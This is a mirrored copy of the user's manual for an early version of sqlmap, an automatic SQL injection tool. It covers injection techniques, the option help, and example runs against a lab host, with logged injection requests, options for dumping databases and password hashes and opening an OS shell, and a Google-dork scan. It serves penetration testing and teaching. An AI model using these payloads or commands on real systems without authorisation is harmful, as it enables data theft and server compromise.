mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-24 18:43:47 +03:00
6e548eb2ec
log file and updated the documentation
3318 lines
119 KiB
Plaintext
3318 lines
119 KiB
Plaintext
<!doctype linuxdoc system>
|
|
|
|
<article>
|
|
|
|
<title>sqlmap user's manual
|
|
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
|
<date>version 0.6.3, DDth of December 2008
|
|
<abstract>
|
|
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
|
|
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
|
|
for the latest version.
|
|
</abstract>
|
|
|
|
<toc>
|
|
|
|
|
|
<sect>Introduction
|
|
<p>
|
|
sqlmap is an automatic <htmlurl url="http://www.google.com/search?q=SQL+injection"
|
|
name="SQL injection"> tool. Its goal is to detect and take advantage of
|
|
SQL injection vulnerabilities on web applications. Once it detects one or
|
|
more SQL injections on the target host, the user can choose among a
|
|
variety of options to perform an extensive back-end database management
|
|
system fingerprint, retrieve DBMS session user and database, enumerate
|
|
users, password hashes, privileges, databases, dump entire or user's
|
|
specific DBMS tables/columns, run his own SQL <tt>SELECT</tt> statement,
|
|
read specific files on the file system and much more.
|
|
|
|
|
|
<sect1>Requirements
|
|
|
|
<p>
|
|
sqlmap is developed in <htmlurl url="http://www.python.org" name="Python">,
|
|
a dynamic object-oriented interpreted programming language.
|
|
This makes the tool independent from the operating system since it only
|
|
requires the Python interpreter version equal or above to 2.4.
|
|
The interpreter is freely downloadable from its
|
|
<htmlurl url="http://python.org/download/" name="official site">.
|
|
To make it even easier, many GNU/Linux distributions come out of the box
|
|
with Python interpreter package installed and other Unices and MacOS X
|
|
too provide it packaged in their formats and ready to be installed.
|
|
Windows users can download and install the Python setup-ready installer
|
|
for x86, AMD64 and Itanium too.
|
|
|
|
Optionally, if you are running sqlmap on Windows, you may wish to install
|
|
<htmlurl url="http://ipython.scipy.org/moin/PyReadline/Intro" name="PyReadline">
|
|
to be able to take advantage of the sqlmap TAB completion and history
|
|
support functionalities in the SQL shell and OS shell.
|
|
Note that these functionalities are available natively by Python official
|
|
readline library on other operating systems.
|
|
|
|
|
|
<sect1>Scenario
|
|
|
|
<p>
|
|
Let's say that you are auditing a web application and found a web page
|
|
that accepts dynamic user-provided values on <tt>GET</tt> or <tt>POST</tt>
|
|
parameters or HTTP <tt>Cookie</tt> values or HTTP <tt>User-Agent</tt>
|
|
header value.
|
|
You now want to test if these are affected by a SQL injection
|
|
vulnerability, and if so, exploit them to retrieve as much information as
|
|
possible out of the web application's back-end database management system
|
|
or even be able to access the underlying operating system.
|
|
|
|
Consider that the target url is:
|
|
|
|
<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2</tt></tscreen>
|
|
|
|
Assume that:
|
|
|
|
<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1&cat=2</tt></tscreen>
|
|
|
|
is the same page as the original one and:
|
|
|
|
<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2&cat=2</tt></tscreen>
|
|
|
|
differs from the original one, it means that you are in front of a SQL
|
|
injection vulnerability in the <tt>id</tt> <tt>GET</tt> parameter of the
|
|
<tt>index.php</tt> web application page which means that no IDS/IPS, no
|
|
web application firewall, no parameters' value sanitization is performed
|
|
on the server-side.
|
|
|
|
This is a quite common flaw in dynamic content web applications and it
|
|
does not depend upon the back-end database management system nor on the web
|
|
application programming language: it is a programmer code's security flaw.
|
|
The <htmlurl url="http://www.owasp.org" name="Open Web Application Security Project">
|
|
recently rated in their <htmlurl url="http://www.owasp.org/index.php/Top_10_2007"
|
|
name="OWASP Top Ten"> survey this vulnerability as the <htmlurl
|
|
url="http://www.owasp.org/index.php/Top_10_2007-A2" name="most
|
|
common"> and important web application vulnerability, second only to
|
|
<htmlurl url="http://www.owasp.org/index.php/Top_10_2007-A1"
|
|
name="Cross-Site Scripting">.
|
|
|
|
Back to the scenario, probably the SQL <tt>SELECT</tt> statemenet into
|
|
<tt>index.php</tt> has a syntax similar to the following SQL query, in
|
|
pseudo PHP code:
|
|
|
|
<tscreen><tt>
|
|
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
|
|
</tt></tscreen>
|
|
|
|
As you can see, appending any other syntatically valid SQL condition after
|
|
a value for <tt>id</tt> such condition will take place when the web
|
|
application passes the query to the back-end database management system
|
|
that executes it, that is why the condition <tt>id=1 AND 1=1</tt> is valid
|
|
(<em>True</em>) and returns the same page as the original one, with the
|
|
same content and without showing any SQL error message.
|
|
|
|
Moreover, in this simple and easy to inject scenario it would be also
|
|
possible to append, not just one or more valid SQL condition(s), but also
|
|
stacked SQL queries, for instance something like <tt>[...]&id=1;
|
|
ANOTHER SQL QUERY--</tt>
|
|
|
|
Now that you found this SQL injection vulnerable parameter, you can
|
|
exploit it by manipulating the <tt>id</tt> parameter value in the HTTP
|
|
request.
|
|
|
|
There exist many <htmlurl url="http://del.icio.us/inquis/sqlinjection" name="resources">
|
|
on the Net explaining in depth how to prevent and how to exploit SQL
|
|
injection vulnerabilities and it is recommended to read them if you are
|
|
not familiar with the issue before going ahead with sqlmap.
|
|
|
|
Passing the original address, <tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2</tt>
|
|
to sqlmap, the tool will automatically:
|
|
|
|
<itemize>
|
|
<item>Identify the vulnerable parameter(s) (<tt>id</tt> in this scenario);
|
|
<item>Depending on the user's options, sqlmap uses the <bf>blind SQL
|
|
injection</bf> or the <bf>inband SQL injection</bf> technique as described
|
|
in the following section to go ahead with the exploiting.
|
|
</itemize>
|
|
|
|
|
|
<sect1>Techniques
|
|
|
|
<p>
|
|
sqlmap implements two techniques to exploit a SQL injection vulnerability:
|
|
|
|
<itemize>
|
|
<item><bf>Blind SQL injection</bf>, also known as <bf>inference SQL
|
|
injection</bf>: sqlmap appends to the affected parameter in the HTTP
|
|
request, a syntatically valid SQL statement string containing a
|
|
<tt>SELECT</tt> sub-statement, or any other SQL statement whose the user
|
|
want to retrieve the output.
|
|
For each HTTP response, by making a comparison based upon HTML page
|
|
content hashes, or string matches, with the original request, the tool
|
|
determines the output value of the statement character by character.
|
|
The bisection algorithm implemented in sqlmap to perform this technique
|
|
is able to fetch each output character with at maximum seven HTTP
|
|
requests.
|
|
This is sqlmap default SQL injection technique.
|
|
<item><bf>Inband SQL injection</bf>, also known as <bf>UNION query SQL
|
|
injection</bf>: sqlmap appends to the affected parameter in the HTTP
|
|
request, a syntatically valid SQL statement string starting with a
|
|
<tt>UNION ALL SELECT</tt>. This techique is useful if the web application
|
|
page passes the output of the <tt>SELECT</tt> statement to a <tt>for</tt>
|
|
cycle, or similar, so that each line of the query output is printed on the
|
|
page content.
|
|
This technique is much faster if the target url is affected by because
|
|
in a single HTTP response it returns the whole query output within the
|
|
page content.
|
|
This SQL injection technique is an alternative to the first one.
|
|
</itemize>
|
|
|
|
It is strongly recommended to run at least once sqlmap with the
|
|
<tt>--union-test</tt> option to test if the affected parameter is used
|
|
within a <tt>for</tt> cycle, or similar, and in case use
|
|
<tt>--union-use</tt> option to exploit this vulnerability because it
|
|
saves a lot of time and it does not weight down the web server log file
|
|
with hundreds of HTTP requests.
|
|
|
|
|
|
<sect>Features
|
|
|
|
<p>
|
|
Major features implemented in sqlmap include:
|
|
|
|
<itemize>
|
|
<item>Full support for <bf>MySQL</bf>, <bf>Oracle</bf>, <bf>PostgreSQL</bf>
|
|
and <bf>Microsoft SQL Server</bf> back-end database management systems.
|
|
Besides these four database management systems, sqlmap can also identify
|
|
Microsoft Access, DB2, Informix, Sybase and Interbase.
|
|
<item><bf>Extensive back-end database management system fingerprint</bf>
|
|
based upon
|
|
<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="inband error messages">,
|
|
<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="banner parsing">,
|
|
<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="functions output comparison"> and
|
|
<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="specific features">
|
|
such as MySQL comment injection. It is also possible to force the back-end
|
|
database management system name if you already know it.
|
|
<item>Full support for two SQL injection techniques: <bf>blind SQL
|
|
injection</bf> and <bf>inband SQL injection</bf>.
|
|
<item>Options to retrieve on all four back-end database management system
|
|
<bf>banner</bf>, <bf>current user</bf>, <bf>current database</bf>,
|
|
enumerate <bf>users</bf>, <bf>users password hashes</bf>, <bf>users
|
|
privileges</bf>, <bf>databases</bf>, <bf>tables</bf>, <bf>columns</bf>,
|
|
dump <bf>tables entries</bf>, dump <bf>whole database management
|
|
system</bf> and run your <bf>own SQL <tt>SELECT</tt> statement</bf>.
|
|
<item>If the back-end database management system is MySQL it is also
|
|
possible to <bf>read a specific file content</bf> and in some
|
|
circumstances <bf>prompt for an interactive operating system shell</bf>
|
|
with TAB completion and history support.
|
|
<item>Automatically tests all provided <bf>GET</bf> parameters,
|
|
<bf>POST</bf> parameters, HTTP <bf>Cookie</bf> header values and HTTP
|
|
<bf>User-Agent</bf> header value to find the dynamic ones, which means
|
|
those that vary the HTTP response page content.
|
|
On the dynamic ones sqlmap automatically tests and detects the ones
|
|
affected by SQL injection. Each dynamic parameter is tested for
|
|
<em>numeric</em>, <em>single quoted string</em>, <em>double quoted
|
|
string</em> and all of these three datatypes with zero to two parenthesis
|
|
to correctly detect which is the <tt>SELECT</tt> statement syntax to
|
|
perform further injections with. It is also possible to specify the
|
|
parameter(s) that you want to perform tests and use for injection on.
|
|
<item>Option to specify the <bf>maximum number of concurrent HTTP
|
|
requests</bf> to speed up the blind SQL injection algorithms
|
|
(multithreading).
|
|
<item><bf>HTTP <tt>Cookie</tt> header</bf> string support, useful when the
|
|
web application requires authentication based upon cookies and you have
|
|
such data or in case you just want to test for and exploit SQL injection
|
|
on such header.
|
|
<item>Automatically handle <bf>HTTP <tt>Set-Cookie</tt> header</bf> from
|
|
target url, re-establishing of the session if it expires. Test and exploit
|
|
on these values is supported too.
|
|
<item><bf>HTTP Basic and Digest authentications</bf> support.
|
|
<item><bf>Anonymous HTTP proxy</bf> support to pass by the HTTP requests
|
|
to the target URL.
|
|
<item>Options to fake the <bf>HTTP <tt>Referer</tt> header</bf> value and
|
|
the <bf>HTTP <tt>User-Agent</tt> header</bf> value specified by user or
|
|
randomly selected from a text file.
|
|
<item>Support to increase the <bf>verbosity level of output messages</bf>:
|
|
there exist <bf>six levels</bf>. The default level is 0 (silent) in which
|
|
only warnings, errors and tracebacks, if they occur, will be shown.
|
|
<item><bf>Estimated time of arrival</bf> support for each query, updated
|
|
in real time while fetching the information to give to the user an
|
|
overview on how long it will take to retrieve the output.
|
|
<item>Support to save the session (queries and their output, even if
|
|
partially retrieved) in real time while fetching the data on a text file
|
|
and <bf>resume the injection from this file in a second time</bf>.
|
|
<item>Support to read options from a configuration INI file rather than
|
|
specify each time all of the options on the command line. Support also to
|
|
save command line options on a configuration INI file.
|
|
<item>Integration with other IT security related open source projects,
|
|
<htmlurl url="http://metasploit.com/framework/" name="Metasploit"> and <htmlurl
|
|
url="http://w3af.sourceforge.net/" name="w3af">.
|
|
<item><bf>PHP setting <tt>magic_quotes_gpc</tt> bypass</bf> by encoding
|
|
every query string, between single quotes, with <tt>CHAR</tt>, or similar,
|
|
database management system function.
|
|
</itemize>
|
|
|
|
|
|
<sect>Download and update
|
|
|
|
<p>
|
|
sqlmap can be downloaded from its
|
|
<htmlurl url="http://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107"
|
|
name="SourceForge File List page">.
|
|
It is available in various formats:
|
|
|
|
<itemize>
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.tar.gz"
|
|
name="Source gzip compressed"> operating system independent.
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.tar.bz2"
|
|
name="Source bzip2 compressed"> operating system independent.
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.zip"
|
|
name="Source zip compressed"> operating system independent.
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.3-1_all.deb"
|
|
name="DEB binary package"> architecture independent for Debian and any
|
|
other Debian derivated GNU/Linux distribution.
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3-1.noarch.rpm"
|
|
name="RPM binary package"> architecture independent for Fedora and any
|
|
other operating system that can install RPM packages.
|
|
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3_exe.zip"
|
|
name="Portable executable for Windows"> that <bf>does not require the Python
|
|
interpreter</bf> to be installed on the operating system.
|
|
</itemize>
|
|
|
|
<p>
|
|
Whatever way you downloaded sqlmap, run it with <tt>--update</tt>
|
|
option to update it to the latest stable version available on its
|
|
<htmlurl url="http://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107"
|
|
name="SourceForge File List page">.
|
|
|
|
<p>
|
|
You can also checkout the source code from the sqlmap
|
|
<htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/" name="Subversion">
|
|
repository to give a try to the development release:
|
|
|
|
<tscreen><verb>
|
|
$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect>License and copyright
|
|
|
|
<p>
|
|
sqlmap is released under the terms of the
|
|
<htmlurl url="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html" name="General Public License v2">.
|
|
sqlmap is copyrighted by
|
|
<htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
|
and <htmlurl url="mailto:daniele.bellucci@gmail.com" name="Daniele Bellucci">.
|
|
|
|
|
|
<sect>Usage
|
|
|
|
<p>
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -h
|
|
|
|
sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
|
|
Usage: sqlmap.py [options] {-u "<URL>" | -g "<google dork>" | -c "<config file>"}
|
|
|
|
Options:
|
|
--version show program's version number and exit
|
|
-h, --help show this help message and exit
|
|
|
|
Request:
|
|
These options have to be specified to set the target url, HTTP method,
|
|
how to connect to the target url or Google dorking results in general.
|
|
|
|
-u URL, --url=URL Target url
|
|
-g GOOGLEDORK Process Google dork results as target urls
|
|
-p TESTPARAMETER Testable parameter(s)
|
|
--method=METHOD HTTP method, GET or POST (default: GET)
|
|
--data=DATA Data string to be sent through POST
|
|
--cookie=COOKIE HTTP Cookie header
|
|
--referer=REFERER HTTP Referer header
|
|
--user-agent=AGENT HTTP User-Agent header
|
|
-a USERAGENTSFILE Load a random HTTP User-Agent header from file
|
|
--auth-type=ATYPE HTTP Authentication type, value: Basic or Digest
|
|
--auth-cred=ACRED HTTP Authentication credentials, value: name:password
|
|
--proxy=PROXY Use a HTTP proxy to connect to the target url
|
|
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
|
|
--delay=DELAY Delay in seconds between each HTTP request
|
|
|
|
Injection:
|
|
--string=STRING String to match in page when the query is valid
|
|
--dbms=DBMS Force back-end DBMS to this value
|
|
|
|
Techniques:
|
|
These options can be used to test for specific SQL injection technique
|
|
or to use one of them to exploit the affected parameter(s) rather than
|
|
using the default blind SQL injection technique.
|
|
|
|
--time-test Test for Time based blind SQL injection
|
|
--union-test Test for UNION query (inband) SQL injection
|
|
--union-use Use the UNION query (inband) SQL injection to
|
|
retrieve the queries output. No need to go blind
|
|
|
|
Fingerprint:
|
|
-f, --fingerprint Perform an extensive database fingerprint
|
|
|
|
Enumeration:
|
|
These options can be used to enumerate the back-end database
|
|
management system information, structure and data contained in the
|
|
tables. Moreover you can run your own SQL SELECT queries.
|
|
|
|
-b, --banner Retrieve DBMS banner
|
|
--current-user Retrieve DBMS current user
|
|
--current-db Retrieve DBMS current database
|
|
--users Enumerate DBMS users
|
|
--passwords Enumerate DBMS users password hashes (opt: -U)
|
|
--privileges Enumerate DBMS users privileges (opt: -U)
|
|
--dbs Enumerate DBMS databases
|
|
--tables Enumerate DBMS database tables (opt: -D)
|
|
--columns Enumerate DBMS database table columns (req:-T opt:-D)
|
|
--dump Dump DBMS database table entries (req: -T, opt: -D,
|
|
-C, --start, --stop)
|
|
--dump-all Dump all DBMS databases tables entries
|
|
-D DB DBMS database to enumerate
|
|
-T TBL DBMS database table to enumerate
|
|
-C COL DBMS database table column to enumerate
|
|
-U USER DBMS user to enumerate
|
|
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
|
|
--start=LIMITSTART First table entry to dump
|
|
--stop=LIMITSTOP Last table entry to dump
|
|
--sql-query=QUERY SQL SELECT query to be executed
|
|
--sql-shell Prompt for an interactive SQL shell
|
|
|
|
File system access:
|
|
These options can be used to access the back-end database management
|
|
system file system taking advantage of native DBMS functions or
|
|
specific DBMS design weaknesses.
|
|
|
|
--read-file=RFILE Read a specific OS file content (only on MySQL)
|
|
--write-file=WFILE Write to a specific OS file (not yet available)
|
|
|
|
Operating system access:
|
|
This option can be used to access the back-end database management
|
|
system operating system taking advantage of specific DBMS design
|
|
weaknesses.
|
|
|
|
--os-shell Prompt for an interactive OS shell (only on PHP/MySQL
|
|
environment with a writable directory within the web
|
|
server document root for the moment)
|
|
|
|
Miscellaneous:
|
|
--eta Retrieve each query output length and calculate the
|
|
estimated time of arrival in real time
|
|
-v VERBOSE Verbosity level: 0-5 (default 0)
|
|
--update Update sqlmap to the latest stable version
|
|
-s SESSIONFILE Save and resume all data retrieved on a session file
|
|
-c CONFIGFILE Load options from a configuration INI file
|
|
--save Save options on a configuration INI file
|
|
--batch Never ask for user input, use the default behaviour
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect1>Request
|
|
|
|
<sect2>Target URL
|
|
|
|
<p>
|
|
Option: <tt>-u</tt> or <tt>--url</tt>
|
|
|
|
<p>
|
|
To run sqlmap on a single target URL.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2"
|
|
|
|
[...]
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Target URL and verbosity
|
|
|
|
<p>
|
|
Option: <tt>-v</tt>
|
|
|
|
<p>
|
|
Verbose options can be used to set the verbosity level of output messages.
|
|
There exist six levels.
|
|
The default level is 0 (silent) in which only warnings, errors and
|
|
tracebacks, if they occur, will be shown. Level 1 shows also info
|
|
messages, level 2 show also debug messages, level 3 show also HTTP
|
|
requests with all HTTP headers sent, level 4 show also HTTP responses
|
|
headers and level 5 show also HTTP responses page content.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target (verbosity level <bf>1</bf>):
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1
|
|
|
|
[hh:mm:01] [INFO] testing connection to the target url
|
|
[hh:mm:01] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:02] [INFO] url is stable
|
|
[hh:mm:02] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:02] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
[hh:mm:02] [INFO] testing if GET parameter 'id' is dynamic
|
|
[hh:mm:02] [INFO] confirming that GET parameter 'id' is dynamic
|
|
[hh:mm:02] [INFO] GET parameter 'id' is dynamic
|
|
[hh:mm:02] [INFO] testing sql injection on GET parameter 'id'
|
|
[hh:mm:02] [INFO] testing numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:02] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:02] [INFO] GET parameter 'id' is numeric/unescaped injectable
|
|
[hh:mm:02] [INFO] testing if GET parameter 'cat' is dynamic
|
|
[hh:mm:02] [WARNING] GET parameter 'cat' is not dynamic
|
|
[hh:mm:02] [INFO] testing for parenthesis on injectable parameter
|
|
[hh:mm:02] [INFO] the injectable parameter requires 0 parenthesis
|
|
[hh:mm:02] [INFO] testing MySQL
|
|
[hh:mm:02] [INFO] query: CONCAT(CHAR(53), CHAR(53))
|
|
[hh:mm:02] [INFO] retrieved: 55
|
|
[hh:mm:02] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:02] [INFO] confirming MySQL
|
|
[hh:mm:02] [INFO] query: LENGTH(CHAR(53))
|
|
[hh:mm:02] [INFO] retrieved: 1
|
|
[hh:mm:02] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:02] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
|
|
[hh:mm:02] [INFO] retrieved: 5
|
|
[hh:mm:02] [INFO] performed 13 queries in 0 seconds
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target (verbosity level <bf>2</bf>):
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 2
|
|
|
|
[hh:mm:34] [DEBUG] initializing the configuration
|
|
[hh:mm:34] [DEBUG] initializing the knowledge base
|
|
[hh:mm:34] [DEBUG] cleaning up configuration parameters
|
|
[hh:mm:34] [DEBUG] setting the HTTP method to perform HTTP requests through
|
|
[hh:mm:34] [DEBUG] creating HTTP requests opener object
|
|
[hh:mm:34] [DEBUG] parsing XML queries file
|
|
[hh:mm:34] [INFO] testing connection to the target url
|
|
[hh:mm:34] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:35] [INFO] url is stable
|
|
[hh:mm:35] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:35] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
[hh:mm:35] [INFO] testing if GET parameter 'id' is dynamic
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target (verbosity level <bf>3</bf>):
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 3
|
|
|
|
[...]
|
|
[hh:mm:28] [INFO] testing connection to the target url
|
|
[hh:mm:28] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
[...]
|
|
[hh:mm:29] [INFO] testing MySQL
|
|
[hh:mm:29] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
|
[hh:mm:29] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
|
|
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target (verbosity level <bf>4</bf>):
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 4
|
|
|
|
[...]
|
|
[hh:mm:32] [INFO] testing connection to the target url
|
|
[hh:mm:32] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Thu, 24 Jul 2008 14:00:32 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 127
|
|
Connection: close
|
|
Content-Type: text/html
|
|
[...]
|
|
[hh:mm:33] [INFO] testing MySQL
|
|
[hh:mm:33] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
|
[hh:mm:33] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
|
|
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Thu, 24 Jul 2008 14:00:33 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 75
|
|
Connection: close
|
|
Content-Type: text/html
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target (verbosity level <bf>5</bf>):
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5
|
|
|
|
[...]
|
|
[hh:mm:23] [INFO] testing connection to the target url
|
|
[hh:mm:23] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Thu, 24 Jul 2008 14:02:23 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 127
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
|
</table>
|
|
</body></html>
|
|
[...]
|
|
[hh:mm:24] [INFO] testing MySQL
|
|
[hh:mm:24] [INFO] query: CONCAT(CHAR(51), CHAR(51))
|
|
[hh:mm:24] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20
|
|
CHAR%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201855=1855&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:24] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Thu, 24 Jul 2008 14:02:24 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 75
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
</table>
|
|
</body></html>
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>List of targets
|
|
|
|
<p>
|
|
Option: <tt>-l</tt>
|
|
|
|
<p>
|
|
TODO
|
|
|
|
|
|
<sect2>Process Google dork results as target urls
|
|
|
|
<p>
|
|
Option: <tt>-g</tt>
|
|
|
|
<p>
|
|
Rather than providing a target URL it is also possible to test and inject
|
|
on <tt>GET</tt> parameters on the results of your Google dork.
|
|
|
|
This option makes sqlmap negotiate with the search engine its session
|
|
cookie to be able to perform a search, then sqlmap will retrieve Google
|
|
first 100 results for the Google dork expression with <tt>GET</tt> parameters
|
|
asking you if you want to test and inject on each possible affected URL.
|
|
|
|
<p>
|
|
Example of Google dorking with expression <tt>site:yourdomain.com
|
|
inurl:example.php</tt>:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -g "site:yourdomain.com inurl:example.php" -v 1
|
|
|
|
[hh:mm:38] [INFO] first request to Google to get the session cookie
|
|
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
|
|
testable hosts
|
|
[hh:mm:40] [INFO] url 1: http://yourdomain.com/example.php?id=12, do you want to test this
|
|
url? [y/N/q] n
|
|
[hh:mm:43] [INFO] url 3: http://yourdomain.com/example.php?id=24, do you want to test this
|
|
url? [y/N/q] n
|
|
[hh:mm:42] [INFO] url 2: http://thirdlevel.yourdomain.com/news/example.php?today=483, do you
|
|
want to test this url? [y/N/q] y
|
|
